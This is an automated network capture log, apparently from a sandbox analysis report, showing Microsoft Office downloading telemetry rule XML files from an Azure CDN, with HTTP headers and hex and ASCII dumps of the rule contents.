                                                                                                                                                                                                        2024-12-04 12:53:11 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                        Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                                                        2024-12-04 12:53:12 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                                                        Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                                                        2024-12-04 12:53:12 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                                                        Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                                                        2024-12-04 12:53:12 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                        Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                                                        2024-12-04 12:53:12 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                                                                        Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                                                        2024-12-04 12:53:12 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                                                                        Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                                                        2024-12-04 12:53:12 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                                                        Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                                                                                        2024-12-04 12:53:12 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                                                        2024-12-04 12:53:12 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        1192.168.2.74970413.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:14 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:14 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 450
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                        x-ms-request-id: c4831996-901e-0016-39ce-45efe9000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125314Z-1746fd949bd2cq7chC1EWRnx9g00000000rg00000000cc82
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:14 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        2192.168.2.74970313.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:14 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:14 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 3788
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                        x-ms-request-id: 667c147a-501e-0016-34cc-45181b000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125314Z-1746fd949bddtfvqhC1EWRxbpg000000015g000000006ccs
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:14 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        3192.168.2.74970713.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:14 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:14 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 2160
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                        x-ms-request-id: 115d5b31-c01e-0046-4bcb-452db9000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125314Z-1746fd949bdlnsqphC1EWRurw0000000015g000000001www
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:14 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        4192.168.2.74970513.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:14 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:14 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 2980
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                        x-ms-request-id: 40031d31-601e-005c-53c5-45f06f000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125314Z-1746fd949bddtfvqhC1EWRxbpg00000001500000000079ux
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:14 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        5192.168.2.74970613.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:14 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:14 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 408
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                        x-ms-request-id: 9ac3d201-201e-0000-03c5-45a537000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125314Z-1746fd949bdkw94lhC1EWRxuz400000001a000000000adsd
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:14 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        6192.168.2.74970913.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:16 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:16 GMT
